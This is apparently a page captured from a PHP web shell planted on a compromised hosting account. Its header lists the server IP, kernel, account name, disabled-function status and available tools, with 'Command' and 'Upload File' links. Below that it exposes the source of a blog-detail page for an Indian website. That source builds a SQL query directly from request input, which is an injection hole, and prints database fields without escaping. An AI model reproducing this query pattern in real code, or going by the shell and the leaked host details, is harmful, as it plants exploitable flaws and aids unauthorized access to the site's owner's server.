Server IP : 103.53.40.154 / Your IP : 13.58.28.196 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/bethepolice.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); $slug_name = $_GET['slug_link']; if(isset($_SERVER['PATH_INFO'])){ $slug_name=$_SERVER['PATH_INFO']; $querydt="SELECT * FROM `tbl_blog` WHERE `slug_link`='$slug_name'"; $rundt = mysqli_query($db,$querydt) or die("Query Not run"); $datadt = mysqli_fetch_assoc($rundt); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Our Mission</title> <?php include "top-links.php";?> </head> <body> <!--header --> <?php include "header.php";?> <section class="inner-header divider layer-overlay overlay-dark-6" data-bg-img="<?= $wspath ?>img/breadcrumbs.jpg" style="background-image: url('<?= $wspath ?>img/breadcrumbs.jpg'); background-position: center; background-size: cover;"> <div class="container pt-120 pb-60"> <div class="section-content"> <div class="row"> <div class="col-md-6 p-4"> <h2 class="text-theme-colored2 font-36"><?= $datadt['title'] ?></h2> <ol class="breadcrumb text-left mt-10 white"> <li><a href="">Home </a></li> <span> | </span><li class="active"><a href="<?= $wspath ?>detail<?= $datadt['slug_link'] ?>.html"><?= $datadt['title'] ?></a></li> </ol> </div> </div> </div> </div> </section> <!--marquee --> <?php include "home-marquee.php";?> <!-- about section --> <section id="news-details"> <div class="container"> <div class="row"> <div class="col-lg-1"></div> <div class="col-lg-10"> <div class="news-details-inner"> <img src="<?php echo $wspath ?>admin/images/property-image/<?= $datadt['image'] ?>"> <h2> <?= $datadt['title'] ?> </h2> <p> <?= $datadt['short_description'] ?> </p> </div> </div> <div class="col-lg-1"></div> </div> </div> </section> <!--footer --> <?php include "footer.php";?> </body> </html>